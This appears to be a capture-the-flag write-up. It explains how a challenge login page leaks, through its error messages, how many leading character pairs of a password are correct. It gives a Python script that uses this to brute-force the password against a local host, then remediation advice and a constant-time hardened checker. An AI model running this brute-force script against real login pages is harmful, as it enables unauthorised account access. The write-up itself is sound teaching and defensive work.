Vulnerability analysis

The SpaghettiWestern application automatically releases the flag if the user knows (or guesses) an 8-character password of lower-case letters. The input field is not SQL-injectable, and the password is too long to be brute-forced directly. However, the website returns a different message depending on how many leading character pairs the user guessed. This greatly simplifies the brute-forcing, since the attacker can guess one character pair at a time: at most 26 * 26 attempts per pair instead of 26^8 for the whole password. Exploiting this vulnerability requires scripting.

Exploitation

```python
#!/usr/bin/env python3
import string
import sys

import requests

protocol = "http"
domain = "127.0.0.1"
port = "80"
page_name = "/index.php"

# Error messages returned by the application; each one reveals how many
# leading character pairs of the submitted password were correct.
msg1 = "Still wrong password, but hey! don't try jokes. Bambino's looking at you."
msg2 = "Still wrong password, but now I'm getting angry. STOP RIGHT NOW!"
msg3 = "SLAP! Still wrong password! These brothers follow the rule \"an eye for an eye, a tooth for a tooth\"."
msg4 = "So are you! The right hand of the devil!"
messages = {1: msg1, 2: msg2, 3: msg3, 4: msg4}

url = protocol + "://" + domain + ":" + port + page_name

print("Guessing password...")
guessed_part = ""
char_list = string.ascii_lowercase

# Guess the 8-character password two characters at a time (4 pairs).
for pair_no in range(1, 5):
    guessed = False
    for char1 in char_list:
        print(char1 + "*")
        for char2 in char_list:
            password = guessed_part + char1 + char2
            payload = {"password": password}
            response = requests.post(url, data=payload)
            if response.status_code != requests.codes.ok:
                sys.exit("Status code not OK")
            # The message for this pair number appears only when the pair is right.
            if messages[pair_no] in response.text:
                guessed = True
                guessed_part = guessed_part + char1 + char2
                print("Guessed pair: " + char1 + char2)
                break
        if guessed:
            break
    if not guessed:
        sys.exit("Exhaustive search gave no results")

print()
print("Done.")
print("Complete password: " + password)
```

Remediation

The log-in mechanism should not give informative messages about how many characters of the password the user guessed. Also, the response time should not depend on it, to avoid timing-based brute-force attacks.
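The following added example (not code from the challenge or the write-up) contrasts the per-pair check described above with a hardened check that returns a single generic message and compares a fixed-length digest in constant time; `SECRET` is a constructed placeholder, not the challenge's real password.

```python
import hashlib
import hmac

# Constructed placeholder secret: 8 lower-case characters, like the challenge.
SECRET = "abcdefgh"
SALT = b"constructed-salt"
# Stored form of the secret: a salted PBKDF2 digest of fixed length.
STORED = hashlib.pbkdf2_hmac("sha256", SECRET.encode(), SALT, 100_000)


def leaky_check(candidate: str) -> str:
    """The pattern described in the write-up: the reply depends on how many
    leading character pairs match, so each pair becomes a separate oracle."""
    matched = 0
    for i in range(0, len(SECRET), 2):
        if candidate[i:i + 2] != SECRET[i:i + 2]:
            break
        matched += 1
    if matched == len(SECRET) // 2:
        return "Correct."
    return "Wrong password (matched pairs: %d)" % matched


def hardened_check(candidate: str) -> str:
    """Derive the same digest from the candidate and compare it to the stored
    one in constant time. Work done and message returned do not depend on
    how much of the password was right."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), SALT, 100_000)
    if hmac.compare_digest(digest, STORED):
        return "Correct."
    return "Wrong password."


def distinct_responses(check, candidates):
    """Set of distinct replies a checker produces; one entry means no oracle."""
    return sorted({check(c) for c in candidates})


# Constructed wrong guesses with 0, 1, 2 and 3 correct leading pairs.
CANDIDATES = ["zzzzzzzz", "abzzzzzz", "abcdzzzz", "abcdefzz"]

if __name__ == "__main__":
    print("leaky:   ", distinct_responses(leaky_check, CANDIDATES))
    print("hardened:", distinct_responses(hardened_check, CANDIDATES))
```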